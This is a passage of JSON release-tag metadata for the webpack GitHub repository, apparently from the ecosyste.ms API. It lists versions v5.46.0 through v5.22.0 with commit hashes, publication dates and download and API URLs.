hed_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependen